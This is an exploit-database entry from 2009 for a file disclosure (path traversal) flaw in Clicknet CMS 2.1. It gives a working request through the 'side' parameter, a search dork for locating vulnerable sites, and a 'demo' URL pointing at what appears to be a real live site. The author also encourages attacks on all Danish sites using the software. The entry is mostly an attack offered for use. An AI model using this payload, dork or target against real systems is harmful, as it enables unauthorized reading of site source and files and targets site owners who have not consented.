id: 5428
date: 06/28/2009
title: Clicknet CMS 2.1 (side) Arbitrary File Disclosure Vulnlerability
author: ThE g0bL!N
cves: 

================================================================
Clicknet CMS 2.1 (side) Arbitrary File Disclosure Vulnlerability
================================================================



#################################################################################################################
[+] Clicknet CMS v2.1(side) File Disclosure Vulnerability
[+] Discovered By ThE g0bL!N
[+] Vendor:http://cms.clicknet.dk
[+} Download:http://cms.clicknet.dk/download/index.php?test=2
[+] Dork:"Powered by Clicknet CMS"
[+] Note: All Site Danemark So Fuck It please :)
#################################################################################################################
Exploit:
-------
Exploit
---
http://127.0.0.1/index.php?side=../index [ out of .php ]
Then View Source To Get A good View
Demo
----
http://www.t68.clicknet.dk/index.php?side=../index
################################################################################################################



#  0day.today [2023-03-22]  #